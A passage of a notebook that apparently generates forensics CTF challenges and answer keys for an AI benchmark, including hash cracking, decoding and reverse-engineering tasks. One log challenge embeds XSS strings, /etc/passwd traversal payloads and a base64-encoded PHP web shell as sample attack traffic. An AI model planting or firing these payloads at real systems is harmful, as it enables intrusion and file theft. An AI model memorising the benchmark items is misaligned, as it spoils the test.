#DFIR-Metric Dataset (Module II CTF JSON generator)


In [1]:
# STEP 0: Install packages
from tqdm import tqdm

requirements_txt = """
pyppeteer
tinyec
PyExifTool
pyminizip
pycryptodome
numpy
PyJWT
lorem-text
reportlab
PyPDF2
"""
pip_packages = requirements_txt.strip().split("\n")

print("Installing packages:")
for package in tqdm(pip_packages, desc="Pip Packages"):
    !pip install {package} --upgrade >/dev/null 2>&1

# System package installation
!apt-get install -y exiftool >/dev/null 2>&1

print("[*] Requirements installation: DONE")


Installing packages:


Pip Packages: 100%|██████████| 10/10 [00:55<00:00,  5.57s/it]


[*] Requirements installation: DONE


In [2]:
import random, string , re, json, hashlib, base64, tempfile, os, subprocess , exiftool,binascii, jwt, zlib, io
from lorem_text import lorem
from datetime import timedelta, datetime
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Cipher import AES
from tempfile import NamedTemporaryFile
import pyminizip
import numpy as np
from PIL import Image, ImageDraw, ImageFont
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from PyPDF2 import PdfWriter, PdfReader
from collections import Counter

In [4]:
class DFIR_Metric_CTF():
    def __init__(self):
      """Initialize the DFIR challenge generator."""

      #100 usernames for challenges
      self.usernames = [
          "usernova", "happycloud", "skyjumper", "techwhiz", "datawizard",
          "codecrafter", "nexustech", "futurebyte", "cyberknight", "logicwolf",
          "mindmaze", "quantumboy", "stellarlady", "darkpixel", "cyberblade",
          "mechpilot", "netrider", "bytehunter", "packetfox", "zerohero",
          "bitshifter", "firelogic", "corecrunch", "netstorm", "webshadow",
          "cryptolord", "vaultkeeper", "infoseeker", "safehaven", "echohawk",
          "nightowlz", "stormbyte", "neonflare", "skybreaker", "ironwave",
          "axionflux", "spacebender", "gravitycore", "lightpulse", "thunderbit",
          "glitchgeist", "bugcatcher", "silentdev", "rapidcoder", "phantomcore",
          "bytequest", "codecraze", "scripthawk", "darkcipher", "binaryfox",
          "systemz", "matrixmonk", "dreamcode", "vectorblade", "asyncfox",
          "pyrobyte", "cypherwolf", "driftbyte", "overdrive", "mainframer",
          "devspecter", "alphaone", "omegabot", "codebeast", "scriptshade",
          "vortexdata", "netninja", "shellwizard", "kernelghost", "byteknight",
          "virtualrider", "technozeal", "gadgeteer", "nexuspulse", "metanode",
          "coretracker", "flowbyte", "ultraframe", "echozoner", "darkstream",
          "silentflux", "tracehound", "flowrider", "cloudstreak", "datawhirl",
          "microgeist", "robojourney", "deepseek", "coreguardian", "cryptowatch",
          "cybersleuth", "blocksmith", "packetstorm", "ghostmapper", "nightflare",
          "ciphercoder", "codetrekker", "voltvision", "techseeker", "glitchcode"
      ]


      self.GENERAL_PROMPT = """You have been given the task of solving the following challenge.

        #Instructions:
              a. Carefully read the challenge description.
              b. Determine the most effective approach to solve the challenge. This may include writing a program, utilizing external resources, employing specific tools, or any other suitable methods.
              c. We are solely interested in the solution, not the method used to obtain it.
              d. Confidence in your solution is extremely important. If your answer is correct, you will get +1 point. If incorrect, you will get -2 point. If you are unsure of the solution, or you can not solve it respond in this XML format:  <xml>I-DO-NOT-KNOW</xml> to receive 0 points without penalty for an incorrect answer.
              e. Be sure to double-check your solution before answering and  make sure your answer follows the required XML format as specified in the challenge.


        #Challenge:

        """

      self.NO_EXPLANATION_PROMPT = " Do NOT include any explanation or additional text in the response. ALWAYS return the answer in this XML format: "



        # -----------------------------DFIR MODULE III CTF-style  challenges---------------------------

    def DFIR_1(self):
          """Challenge: Count Specific Characters"""
          # Generate a random sequence of lowercase letters of length 1000
          sequence = "".join(random.choices(string.ascii_lowercase, k=1000))

          # Choose a random character to count in the sequence
          target_char = random.choice(string.ascii_lowercase)
          target_char_count = sequence.count(target_char)

          challenge_data = {
              "challenge": {
                  "description": f"Given the sequence: '{sequence}'.",
                  "instructions": f"Count the number of occurrences of the character '{target_char}' in the sequence."
                  + self.NO_EXPLANATION_PROMPT
                  + "'<xml>result</xml>'.",
                  "answer": f"<xml>{target_char_count}</xml>"
              },
          }
          return challenge_data


    def DFIR_2(self):
        """Challenge: Identify the used hash algorithm"""
        # Generate a random 5-character string
        random_string = "".join(random.choices(string.ascii_letters + string.digits, k=5))

        # Define hash functions
        hash_functions = {
            "MD5": hashlib.md5,
            "SHA1": hashlib.sha1,
            "SHA224": hashlib.sha224,
            "SHA256": hashlib.sha256,
            "SHA512": hashlib.sha512
        }

        # Randomly select a hash function
        hash_name, hash_func = random.choice(list(hash_functions.items()))
        hashed_string = hash_func(random_string.encode()).hexdigest()

        challenge_data = {
            "challenge": {
                "description": f"Given this hashed string: '{hashed_string}'.",
                "instructions": "The hash algorithm used is one of MD5, SHA1, SHA224, SHA256, SHA512. Identify the correct hash algorithm that was used."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>result</xml>'.",
                "answer": f"<xml>{hash_name}</xml>"
            },
        }
        return challenge_data

    def DFIR_3(self):
        """Challenge: Extract attacker IP from logs with obfuscated payloads"""
        # Web logs with obfuscated XSS and directory traversal attempts
        attacker_ip = f"10.12.{random.randint(1,254)}.{random.randint(1,254)}"
        encoded_payloads = [
          base64.b64encode(b"<script>alert(1)</script>").decode(),  # basic XSS
          base64.b64encode(b"../../../../etc/passwd").decode(),      # LFI via base64
          "%3Cscript%3Ealert%281%29%3C%2Fscript%3E",                  # URL-encoded XSS
          "%2E%2E%2F%2E%2E%2Fetc%2Fpasswd",                           # ../ encoded traversal
          "%2e%2e%5c%2e%2e%5cwindows%5csystem32",                     # Windows traversal
          "%3Ciframe%20src%3Djavascript%3Aalert%281%29%3E",           # iframe XSS
          "%253Cscript%253Ealert(1)%253C/script%253E",               # double-encoded XSS
          "%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(1)%22%3E",     # XSS via image tag
          "%3Cbody%20onload%3Dalert(1)%3E",                           # onload event XSS
          "%3Csvg%2Fonload%3Dalert(1)%3E",                            # XSS via SVG
          base64.b64encode(b"<iframe src='javascript:alert(1)'></iframe>").decode(),
          base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode(),  # base64 encoded web shell
          "%252E%252E%252Fetc%252Fpasswd",                           # triple-encoded traversal
          "%3Cobject%20data%3Djavascript%3Aalert(1)%3E",              # object tag XSS
          "....//....//etc/passwd",                                  # obfuscated traversal
        ]


        log_entries = []
        for _ in range(150):
            timestamp = datetime.now() - timedelta(seconds=random.randint(0, 86400))
            ip = attacker_ip if random.random() < 0.1 else f"192.168.{random.randint(0,255)}.{random.randint(1,254)}"
            method = "POST" if random.random() < 0.3 else "GET"

            if ip == attacker_ip and random.random() < 0.7:
                payload = random.choice([
                    f"/search?q={random.choice(encoded_payloads)}",
                    f"/download?file={random.choice(encoded_payloads)}",
                    f"/api/v1/{base64.b64encode(b'../../../../bin/bash').decode()}"
                ])
                status = 200 if "search" in payload else 403
            else:
                payload = f"/{random.choice(['index.html', 'about.html', 'contact.html'])}"
                status = 200

            log_entries.append(
                f'{ip} - - [{timestamp.strftime("%d/%b/%Y:%H:%M:%S +0000")}] "{method} {payload} HTTP/1.1" {status} 1434'
            )

        challenge_data = {
            "challenge": {
                "description": "The following web server logs contain entries, including potential attacks such as XSS or directory traversal.",
                "instructions": f"From the logs, identify the IP address responsible for the obfuscated malicious requests.\n\nLogs:\n{log_entries}"
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>result</xml>'.",
                "answer": f"<xml>{attacker_ip}</xml>"
            },
        }
        return challenge_data

    def DFIR_4(self):
        """Challenge: Extract XOR-obfuscated flag from logs"""
        flag = f"flag{{LOG_{''.join(random.choices('ABCDEF123456', k=8))}}}"
        timestamp = datetime.now()
        log_entries = []
        key = random.randint(1, 255)

        # Generate XOR-obfuscated flag
        xor_flag = bytes([ord(c) ^ key for c in flag]).hex()

        # Create fake log entries with encoded characters
        for c in flag:
            fake_ip = f"127.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}"
            timestamp += timedelta(seconds=ord(c))
            log_entries.append(
                f"{timestamp.strftime('%d/%b/%Y:%H:%M:%S')} - {fake_ip} "
                f"GET /{c.encode().hex()}/x{key:02x} HTTP/1.1 200 {random.randint(100,999)}"
            )

        challenge_data = {
            "challenge": {
                "description": "The following web server logs contain hidden information.",
                "instructions": "Examine the logs below to uncover a flag concealed using XOR encryption. The flag format is like: flag{...}\n\nLogs:\n"
                                + "\n".join(log_entries)
                                + self.NO_EXPLANATION_PROMPT
                                + "'<xml>result</xml>'.",
                "answer": f"<xml>{flag}</xml>"
            },
        }
        return challenge_data


    def DFIR_5(self):
        """Challenge: Decode a string that was base64 encoded multiple times"""
        random_string = "".join(random.choices(string.ascii_letters + string.digits, k=10))
        n = random.randint(1, 25)

        encoded_string = random_string
        for _ in range(n):
            encoded_string = base64.b64encode(encoded_string.encode()).decode()

        challenge_data = {
            "challenge": {
                "description": f"Given a string that has been base64 encoded {n} times: '{encoded_string}'.",
                "instructions": "Decode the string repeatedly until you recover the original 10-character string."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_string</xml>'.",
                "answer": f"<xml>{random_string}</xml>"
            },
        }
        return challenge_data

    def DFIR_6(self):
        """Challenge: Decode a single-layer base64 string"""
        random_string = "".join(random.choices(string.ascii_letters + string.digits, k=20))
        encoded_string = base64.b64encode(random_string.encode()).decode()

        challenge_data = {
            "challenge": {
                "description": f"Given this base64 encoded string: '{encoded_string}'.",
                "instructions": "Decode the base64 string to recover the original 20-character string."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_string</xml>'.",
                "answer": f"<xml>{random_string}</xml>"
            },
        }
        return challenge_data

    def DFIR_7(self):
        """Challenge: Find dynamically XOR-encoded flag in a hex dump"""
        flag = f"flag{{HEX_{''.join(random.choices('1234567890ABCDEF', k=10))}}}"
        xor_key = random.randint(1, 255)  # Dynamic XOR key

        dump_bytes = [random.randint(0, 255) for _ in range(16 * 16)]

        # Insert XOR-encoded flag at a random position where it fits
        start_index = random.randint(0, (16 * 16) - len(flag))
        for i, char in enumerate(flag):
            dump_bytes[start_index + i] = ord(char) ^ xor_key

        # Format into hex dump
        rows = []
        for i in range(0, len(dump_bytes), 16):
            row = dump_bytes[i:i + 16]
            hex_row = ' '.join(f"{b:02x}" for b in row)
            rows.append(f"0x{i:04x}: {hex_row}")

        challenge_data = {
            "challenge": {
                "description": "The following is a hex dump containing a hidden flag.\n"
                              "The flag follows the format: flag{...}",
                "instructions": f"Each character of the flag was XOR'ed with the key 0x{xor_key:02x} and inserted into the dump.\n"
                                "Your task is to recover the original flag from the dump below.\n\n"
                                "Hex Dump:\n" + "\n".join(rows)
                                + self.NO_EXPLANATION_PROMPT
                                + "'<xml>flag</xml>'.",
                "answer": f"<xml>{flag}</xml>"
            },
        }
        return challenge_data

    def DFIR_8(self):
        """Challenge: Decode a flag from reversed binary and Base85"""
        flag = f"flag{{BIN_{''.join(random.choices('01', k=14))}}}"

        # Step 1: ASCII to reversed binary, space-separated
        layer1 = ' '.join([bin(ord(c))[2:].zfill(8)[::-1] for c in flag])

        # Step 2: Base85 encode the binary string
        layer2 = base64.b85encode(layer1.encode()).decode()

        challenge_data = {
            "challenge": {
                "description": "The following string encodes a hidden flag using two layers of encoding.\n"
                              "The flag format is: flag{...}",
                "instructions": "Decoding steps:\n"
                                "  1. Decode from Base85.\n"
                                "  2. Interpret the resulting reversed binary as ASCII characters.\n\n"
                                "Encoded String:\n'" + layer2+"'"
                                + self.NO_EXPLANATION_PROMPT
                                + "'<xml>flag</xml>'.",
                "answer": f"<xml>{flag}</xml>"
            },
        }
        return challenge_data


    def DFIR_9(self):
        """Challenge: Reverse a String"""
        original_string = "".join(random.choices(string.ascii_lowercase, k=100))
        reversed_string = original_string[::-1]

        challenge_data = {
            "challenge": {
                "description": f"Given the following string: '{original_string}'.",
                "instructions": f"Write a function to reverse the given string and provide the reversed string."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>output</xml>'.",
                "answer": f"<xml>{reversed_string}</xml>",
            },
        }
        return challenge_data

    def DFIR_10(self):
        """Challenge: Longest Common Subsequence"""

        def random_string(length):
            return "".join(random.choices(string.ascii_lowercase, k=length))

        str1 = random_string(1000)
        str2 = random_string(1000)

        def compute_lcs(s1, s2):
            m = len(s1)
            n = len(s2)

            # Create a table to store lengths of longest common suffixes of substrings.
            LCSuf = [[0] * (n + 1) for _ in range(m + 1)]
            length = 0  # Length of the longest common substring
            ending_index = 0  # Ending index of the longest common substring in s1

            # Build the LCSuf table in bottom-up fashion.
            for i in range(1, m + 1):
                for j in range(1, n + 1):
                    if s1[i - 1] == s2[j - 1]:
                        LCSuf[i][j] = LCSuf[i - 1][j - 1] + 1
                        if LCSuf[i][j] > length:
                            length = LCSuf[i][j]
                            ending_index = i  # Update the ending index of LCS
                    else:
                        LCSuf[i][j] = 0

            # If no common substring is found
            if length == 0:
                return ""

            # Extract the longest common substring from s1
            start_index = ending_index - length
            return s1[start_index:ending_index]

        lcs = compute_lcs(str1, str2)

        challenge_data = {
            "challenge": {
                "description": f"Write a function to find the longest common subsequence of the strings '{str1}' and '{str2}'.",
                "instructions": f"Provide the longest common subsequence."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>longest_common_subsequence_string</xml>'.",
                "answer": f"<xml>{lcs}</xml>",
            },
        }
        return challenge_data

    def DFIR_11(self):
        """Challenge: Compute the Hamming distance between two binary strings."""
        binary_str1 = "".join(random.choices("01", k=16))
        binary_str2 = "".join(random.choices("01", k=16))
        hamming_distance = sum(c1 != c2 for c1, c2 in zip(binary_str1, binary_str2))

        challenge_data = {
            "challenge": {
                "description": f"Compute the Hamming distance between the binary strings '{binary_str1}' and '{binary_str2}'.",
                "instructions": "Determine how many positions the two binary strings differ at."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>output</xml>'.",
                "answer": f"<xml>{hamming_distance}</xml>",
            },
        }
        return challenge_data

    def DFIR_12(self):
        """Challenge: Output of Python function"""
        a, b = random.randint(2, 20), random.randint(10000, 100000)
        lst = sum([x**a for x in range(b) if x % 2 == 0])

        challenge_data = {
            "challenge": {
                "description": f"What is the output of the following Python code: ```print(sum([x**{a} for x in range({b}) if x % 2 == 0]))``` ? ",
                "instructions": "Provide the output of the Python code."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>output</xml>'.",
                "answer": f"<xml>{lst}</xml>",
            },
        }
        return challenge_data


    def DFIR_13(self):
        """Challenge: RSA decryption"""

        # Generate RSA keys
        key = RSA.generate(2048)
        public_key = key.publickey()
        private_key = key.export_key()
        cipher = PKCS1_OAEP.new(public_key)

        # Generate a random 16-character message
        message = "".join(
            random.choices(string.ascii_letters + string.digits, k=16)
        ).encode()
        encrypted_message = cipher.encrypt(message)
        base64_encrypted_message = base64.b64encode(encrypted_message).decode()

        # Convert the private key to a string in PEM format for easy use
        pem_private_key = private_key.decode("utf-8")

        challenge_data = {
            "challenge": {
                "description": f"Given an RSA-encrypted message in Base64 format: '{base64_encrypted_message}'.",
                "instructions": f"Decrypt the message using the provided RSA private key and return the plaintext. The RSA private key in PEM format is: '{pem_private_key}'."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>plaintext</xml>'.",
                "answer": f"<xml>{message.decode()}</xml>",
            },
        }
        return challenge_data


    def DFIR_14(self):
        """Challenge: Sum of two randomized numbers in C."""
        num1 = random.randint(1000, 100000)
        num2 = random.randint(1000, 100000)

        c_code = f"""
        #include <stdio.h>

        int main() {{
            int x = {num1};
            int y = {num2};
            int sum;
            sum = x + y;

            printf("%d", sum);
            return 0;
        }}
        """

        challenge_data = {
            "challenge": {
                "description": f"Analyze the following C code:\n ``` {c_code} ```. ",
                "instructions": "Compile the C code and provide the output."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>output</xml>'.",
                "answer": f"<xml>{num1 + num2}</xml>",
            },
        }
        return challenge_data

    def DFIR_15(self):
        """Challenge: Crack an MD5 hash of a given plaintext message."""

        # Generate a random plaintext message (5 characters)
        plaintext = "".join(random.choices(string.ascii_letters + string.digits, k=5))
        md5_hash = hashlib.md5(plaintext.encode()).hexdigest()

        challenge_data = {
            "challenge": {
                "description": f"Given an MD5 hash: '{md5_hash}'. The original password is 5 characters in length and may include uppercase letters, lowercase letters, and digits.",
                "instructions": "Recover the original password."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>password</xml>'.",
                "answer": f"<xml>{plaintext}</xml>",
            },
        }
        return challenge_data

    def DFIR_16(self):
        """Challenge: Crack a SHA2-256 hash of a given plaintext message."""

        # Generate a random plaintext message (5 characters)
        plaintext = "".join(random.choices(string.digits, k=6))
        sha256_hash = hashlib.sha256(plaintext.encode()).hexdigest().upper()

        challenge_data = {
            "challenge": {
                "description": f"Given a SHA2-256 hash: '{sha256_hash}', the original plaintext is a 6-character PIN code consisting only of digits.",
                "instructions": "Recover the original plaintext."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>plaintext</xml>'.",
                "answer": f"<xml>{plaintext}</xml>",
            },
        }
        return challenge_data

    def DFIR_17(self):
        """Challenge: Generate a SHA3-256 hash of a given plaintext message."""

        # Generate a random plaintext message
        plaintext = "".join(random.choices(string.ascii_letters + string.digits, k=20))
        sha3_256_hash = hashlib.sha3_256(plaintext.encode()).hexdigest()

        challenge_data = {
            "challenge": {
                "description": f"Generate a SHA3-256 hash of the given plaintext message: ```{plaintext}```.",
                "instructions": "Return the SHA3-256 hash. The hash output should be in hexadecimal format and lowercase."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>hash</xml>'.",
                "answer": f"<xml>{sha3_256_hash}</xml>",
            },
        }
        return challenge_data

    def DFIR_18(self):
        """Challenge: Caesar Cipher Encryption of a random 30-character string."""

        # Generate a random 30-character string
        random_length = random.randint(30, 60)
        random_string = "".join(random.choices(string.ascii_lowercase, k=random_length))

        # Choose a random shift for Caesar Cipher
        shift = random.randint(1, 25)

        # Encrypt the string using Caesar Cipher
        encrypted_string = "".join(
            (
                chr(((ord(char) - ord("a") + shift) % 26) + ord("a"))
                if char.islower()
                else char
            )
            for char in random_string
        )

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given a Caesar Cipher encrypted string, namely '{encrypted_string}', with a right shift of {shift}.",
                "instructions": "Decrypt the Caesar Cipher string to its original form."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_string</xml>'.",
                "answer": f"<xml>{random_string}</xml>",
            },
        }
        return challenge_data

    def DFIR_19(self):
        """Challange: Find the password in the javascript code."""

        random_password = "".join(random.choices(string.ascii_letters, k=10))

        description = """
            <!DOCTYPE html>
                <html>
                <head>
                    <title>Password Check</title>
                </head>
                <body>
                    <h2>Password Verification</h2>
                    <form id='passwordForm'>
                        <label for='passwordInput'>Enter Password:</label>
                        <input type='user_input' id='passwordInput' required>
                        <button type='submit'>Submit</button>
                    </form>
                    <div id='message' class='message'></div>

                    <script>
                        const user_input = '{random_password}';

                        function checkPassword(event) {{
                            event.preventDefault();

                            const userInput = document.getElementById('passwordInput').value;

                            const messageDiv = document.getElementById('message');
                            if (userInput === user_input) {{
                                messageDiv.textContent = 'Password is correct!';
                                messageDiv.className = 'message success';
                            }} else {{
                                messageDiv.textContent = 'Password is incorrect!';
                                messageDiv.className = 'message error';
                            }}
                        }}

                        document.getElementById('passwordForm').addEventListener('submit', checkPassword);
                    </script>
                </body>
                </html>""".format(
            random_password=random_password
        )

        ## Remove excess whitespaces
        description = "\n".join([line.strip() for line in description.split("\n")])

        challenge_data = {
            "challenge": {
                "description": f"Given the following JavaScript code:\n```{description}```",
                "instructions": "Find the password in the JavaScript code."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>password</xml>'.",
                "answer": f"<xml>{random_password}</xml>",
            },
        }
        return challenge_data

    def DFIR_20(self):
        """Challange: Find the password in the JavaScript code."""

        # Generate a random password
        random_password = "".join(random.choices(string.ascii_letters, k=19))
        encoded_password = base64.b64encode(random_password.encode()).decode()

        # Obfuscated JavaScript template
        description = f"""
        (function() {{
            function _0x4d2d() {{
                const _0x2a92 = [
                    'message', 'passwordForm', 'submit', 'passwordInput',
                    'getElementById', 'addEventListener', 'value',
                    'textContent', 'className', 'Password is correct!',
                    'Password is incorrect!', 'message success', 'message error'
                ];
                _0x4d2d = function() {{ return _0x2a92; }};
                return _0x4d2d();
            }}

            function _0x4e8a(_0x1ebf3f, _0x174ca8) {{
                const _0x4d2dc1 = _0x4d2d();
                return _0x4e8a = function(_0x4e8ab7, _0x19c151) {{
                    _0x4e8ab7 = _0x4e8ab7 - 0x1d8;
                    let _0x377337 = _0x4d2dc1[_0x4e8ab7];
                    return _0x377337;
                }}, _0x4e8a(_0x1ebf3f, _0x174ca8);
            }}

            const password = atob('{encoded_password}');

            function checkPassword(event) {{
                event.preventDefault();
                const userInput = document[_0x4e8a(0x1db)](_0x4e8a(0x1d9))[_0x4e8a(0x1e0)];
                const messageDiv = document[_0x4e8a(0x1db)](_0x4e8a(0x1d8));
                if (userInput === password) {{
                    messageDiv[_0x4e8a(0x1e1)] = _0x4e8a(0x1e2);
                    messageDiv[_0x4e8a(0x1e3)] = _0x4e8a(0x1e4);
                }} else {{
                    messageDiv[_0x4e8a(0x1e1)] = _0x4e8a(0x1e5);
                    messageDiv[_0x4e8a(0x1e3)] = _0x4e8a(0x1e6);
                }}
            }}

            document[_0x4e8a(0x1db)](_0x4e8a(0x1da))[_0x4e8a(0x1df)](_0x4e8a(0x1dc), checkPassword);
        }})();
        """

        ## Remove excess whitespaces
        description = "\n".join([line.strip() for line in description.split("\n")])

        challenge_data = {
            "challenge": {
                "description": f"Given the following JavaScript code: \n```{description}```",
                "instructions": "Discover the password within the JavaScript code."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>password</xml>'.",
                "answer": f"<xml>{random_password}</xml>",
            },
        }
        return challenge_data

    def DFIR_21(self):
        """Challange: Reverse engineer the key needed to open this binary."""
        key = "".join(random.choices(string.ascii_letters + string.digits, k=10))

        c_program_template = f"""
            #include <stdio.h>
            #include <string.h>

            int main() {{
                char key[] = "{key}";
                char input[50];

                printf("Enter the key: ");
                scanf("%s", input);

                if (strcmp(input, key) == 0) {{
                    printf("Correct!\\n");
                }} else {{
                    printf("Incorrect!\\n");
                }}

                return 0;
            }}
            """

        with tempfile.TemporaryDirectory() as temp_dir:
            # Write the C program to a temporary file
            c_file_path = os.path.join(temp_dir, "reverse_me.c")
            with open(c_file_path, "w") as f:
                f.write(c_program_template)

            # Compile the C program using gcc
            binary_path = os.path.join(temp_dir, "reverse_me")
            compile_command = f"gcc {c_file_path} -o {binary_path}"
            try:
                subprocess.run(compile_command, shell=True, check=True)
            except subprocess.CalledProcessError as e:
                print(f"Compilation failed: {e}")
                return None, None

            # Read the compiled binary
            with open(binary_path, "rb") as binary_file:
                binary_data = binary_file.read()

        # Encode the binary data into Base64
        description = base64.b64encode(binary_data).decode()

        challenge_data = {
            "challenge": {
                "description": f"Given the following compiled binary C code in Base64 format: ```{description}```",
                "instructions": "Reverse engineer the key form this compiled binary."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>key</xml>'.",
                "answer": f"<xml>{key}</xml>",
            },
        }
        return challenge_data
    def DFIR_22(self):
        """Challenge: Reverse Engineering the obfuscated key in an executable."""

        key = "".join(random.choices(string.ascii_letters + string.digits, k=10))

        key_obfuscated = "".join(chr(ord(c) + 1) for c in key)

        c_program_template = f"""
            #include <stdio.h>
            #include <string.h>

            void decode_key(char* dest, const char* src) {{
                for (int i = 0; i < strlen(src); i++) {{
                    dest[i] = src[i] - 1;
                }}
                dest[strlen(src)] = '\\0';
            }}

            int main() {{
                char key_obfuscated[11] = "{key_obfuscated}";
                char key[11];
                char input[50];

                decode_key(key, key_obfuscated);

                printf("Enter the key: ");
                scanf("%s", input);

                if (strcmp(input, key) == 0) {{
                    printf("Correct key!\\n");
                }} else {{
                    printf("Incorrect key!\\n");
                }}

                return 0;
            }}
            """

        with tempfile.TemporaryDirectory() as temp_dir:
            # Write the C program to a temporary file
            c_file_path = os.path.join(temp_dir, "reverse_me.c")
            with open(c_file_path, "w") as f:
                f.write(c_program_template)

            # Compile the C program using gcc
            binary_path = os.path.join(temp_dir, "reverse_me")
            compile_command = f"gcc {c_file_path} -o {binary_path}"
            try:
                subprocess.run(compile_command, shell=True, check=True)
            except subprocess.CalledProcessError as e:
                print(f"Compilation failed: {e}")
                return None, None

            # Read the compiled binary
            with open(binary_path, "rb") as binary_file:
                binary_data = binary_file.read()

        description = base64.b64encode(binary_data).decode()

        challenge_data = {
            "challenge": {
                "description": f"Given the following compiled binary C code in Base64 format: {description}",
                "instructions": "Reverse engineer the key form the binary. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>key</xml>'.",
                "answer": f"<xml>{key}</xml>",
            },
        }
        return challenge_data

    def DFIR_23(self):
        """Challenge: Open password-protected ZIP file."""

        password = "".join(random.choices(string.digits, k=4))

        key = "".join(random.choices(string.ascii_letters + string.digits, k=10))

        with NamedTemporaryFile(delete=False, mode="w+", suffix=".txt") as key_file:
            key_file_name = key_file.name
            key_file.write(key)

        # Create a temporary file for the ZIP file
        with NamedTemporaryFile(delete=False, mode="w+", suffix=".zip") as zip_file:
            zip_file_name = zip_file.name

        # Use pyminizip to create a password-protected ZIP file
        pyminizip.compress(key_file_name, None, zip_file_name, password, 0)

        # Read the content of the ZIP file from the temporary file
        with open(zip_file_name, "rb") as zip_file:
            zip_data = zip_file.read()

        b64_zip_data = base64.b64encode(zip_data).decode()

        challenge_data = {
            "challenge": {
                "description": f"Given a base64 encoded, password-protected ZIP file where the password is 4 digits, unzip the file and find the secret key inside it. Here is the encoded data: '{b64_zip_data}'.",
                "instructions": "Decode the base64 data to obtain the ZIP file, unlock 'password.txt' with the correct 4-digit PIN, and retrieve the 10-character secret key from the extracted file."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>secret_key</xml>'.",
                "answer": f"<xml>{key}</xml>",
            },
        }
        return challenge_data

    def DFIR_24(self):
        """Challenge: Find the key hidden inside an image."""

        key = "".join(random.choices(string.ascii_letters + string.digits, k=10))

        noise = np.random.randint(0, 256, (32, 32), dtype=np.uint8)
        noise_image = Image.fromarray(noise, mode="L")
        noise_image.save("tmp_image.png")

        image_path = "tmp_image.png"  # Path to your image
        output_path = "output_image.png"  # Path to save the modified image
        text_to_embed = f"The key is: {key}"

        with exiftool.ExifTool() as et:
            metadata = {"XMP:Description": text_to_embed}
            et.execute(
                *[f"-{key}={value}" for key, value in metadata.items()],
                image_path,
                "-o",
                output_path,
            )

        with open(output_path, "rb") as image_file:
            image_data = image_file.read()
            encoded_image = base64.b64encode(image_data).decode("utf-8")

        os.remove(image_path)
        os.remove(output_path)

        challenge_data = {
            "challenge": {
                "description": f"A key is hidden inside an image. Here is the Base64 encoded image:\n ```{encoded_image}```.",
                "instructions": "Find the key inside the image."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>key</xml>'.",
                "answer": f"<xml>{key}</xml>",
            },
        }
        return challenge_data

    def DFIR_25(self):
        """Challenge: Retrive information from robots.txt."""

        agents = {
            "Googlebot": "User-agent: Googlebot\nDisallow: /no-google/\nDisallow: /sensitive-google/",
            "Bingbot": "User-agent: Bingbot\nDisallow: /no-bing/\nDisallow: /sensitive-bing/",
            "Yandex": "User-agent: Yandex\nDisallow: /no-yandex/\nDisallow: /sensitive-yandex/",
            "Baiduspider": "User-agent: Baiduspider\nDisallow: /no-baidu/\nDisallow: /sensitive-baidu/",
            "DuckDuckBot": "User-agent: DuckDuckBot\nDisallow: /no-duckduckgo/\nDisallow: /sensitive-duckduckgo/",
        }

        # Randomly select 3 agents
        selected_agents = random.sample(list(agents.keys()), 3)

        # Randomly assign one of the selected agents the /administrator/ disallow
        special_agent = random.choice(selected_agents)
        agents[special_agent] += "\nDisallow: /administrator/"

        # Create the robots.txt content
        robots_txt_content = ""
        for agent in selected_agents:
            robots_txt_content += f"{agents[agent]}\n\n"

        # Standard robots.txt content
        robots_txt_standard = "User-agent: *\nDisallow: /admin/\nDisallow: /private/\nDisallow: /sensitive-data/\nDisallow: /hidden/\nDisallow: /config/\n\nAllow: /public/\nAllow: /static/\nAllow: /images/"

        # Combine both parts
        robots_txt = robots_txt_content + robots_txt_standard

        challenge_data = {
            "challenge": {
                "description": f"Given a robots.txt: {robots_txt}.",
                "instructions": "Find the agent for whom the /administrator/ directory is disallowed. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>agent</xml>'.",
                "answer": f"<xml>{special_agent}</xml>",
            },
        }
        return challenge_data

    def DFIR_26(self):
        """Challenge: Find the hidden PIN code in a 2000-character Lorem Ipsum text."""

        def insert_pin_codes(text, correct_phrase, misleading_phrases):
            words = text.split()
            all_phrases = [correct_phrase] + misleading_phrases
            random.shuffle(all_phrases)

            for phrase in all_phrases:
                insert_pos = random.randint(0, len(words))
                words.insert(insert_pos, phrase)

            return " ".join(words)

        # Generate a correct PIN code with a length between 5 and 20
        correct_pin_length = random.randint(5, 20)
        correct_pin_code = "".join(random.choices("0123456789", k=correct_pin_length))
        correct_phrase = f"PIN CODE: {correct_pin_code}"

        # Generate multiple misleading PIN codes with different lengths and formats
        misleading_phrases = []
        while len(misleading_phrases) < 100:  # Generate 10 misleading phrases
            misleading_length = random.choice(
                [x for x in range(5, 21) if x != correct_pin_length]
            )
            misleading_phrases.append(
                f"PIN code: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"PIN CODE: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"PIN_CODE: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
